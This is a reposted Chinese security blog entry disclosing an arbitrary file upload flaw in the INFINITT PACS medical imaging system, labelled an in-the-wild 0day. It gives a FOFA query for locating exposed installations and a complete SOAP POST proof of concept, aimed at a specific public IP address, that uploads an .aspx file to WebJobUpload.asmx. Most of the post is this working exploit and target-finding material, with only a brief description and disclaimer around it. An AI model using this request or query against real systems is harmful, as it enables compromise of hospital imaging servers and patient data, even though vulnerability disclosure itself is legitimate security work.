某国外影像系统任意文件上传漏洞

admin

138633
文章

114
评论

2024年5月17日17:58:26评论291 views字数 996阅读3分19秒阅读模式

本文与浩凯信安共创

大家可以关注一下，后面该公众号也会发一些本公众号不发的漏洞或者文章。

PART.02

漏洞描述

英飞达是一家专业开发医学影像系统的公司，成立于1994年.

英飞达影像存档与通讯PACS系统INFINITT_PACS_WebJobUpload存在任意文件上传漏洞.

PART.03

fofa搜索语句

"INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")

PART.04

影响版本

英飞达影像存档与通讯PACS系统INFINITT_PACS

PART.05

漏洞复现

某国外影像系统任意文件上传漏洞

POC：

POST /webservices/WebJobUpload.asmx HTTP/1.1Host: 91.92.185.75User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Content-Length: 407Accept-Encoding: gzip, deflateContent-Type: text/xml; charset=utf-8Soapaction: "http://rainier/jobUpload"Connection: close<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><jobUpload xmlns="http://rainier"><vcode>1</vcode><subFolder></subFolder><fileName>1234a.aspx</fileName><bufValue>MTIz</bufValue></jobUpload></soap:Body></soap:Envelope>

某国外影像系统任意文件上传漏洞

原文始发于微信公众号（道一安全）：【在野0day】某国外影像系统任意文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

某国外影像系统任意文件上传漏洞

Oracle E-Business Suite远程代码执行漏洞(CVE-2025-30727)

Apache Roller 漏洞让攻击者获得未经授权的访问

Oracle E-Business Suite远程代码执行漏洞（CVE-2025-30727）

Apache Roller 未经授权的访问漏洞

Gladinet漏洞CVE-2025-30406遭在野利用

安美酒店管理系统/get_user_enrollment.php接口 sql注入漏洞

Microsoft Edge信息泄露漏洞(CVE-2025-29834)

【已复现】Gladinet CentreStack & Triofox 远程RCE漏洞（CVE-2025-30406）

【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

CVE-2025-27840：微型 ESP32 芯片如何破解全球比特币钱包

发表评论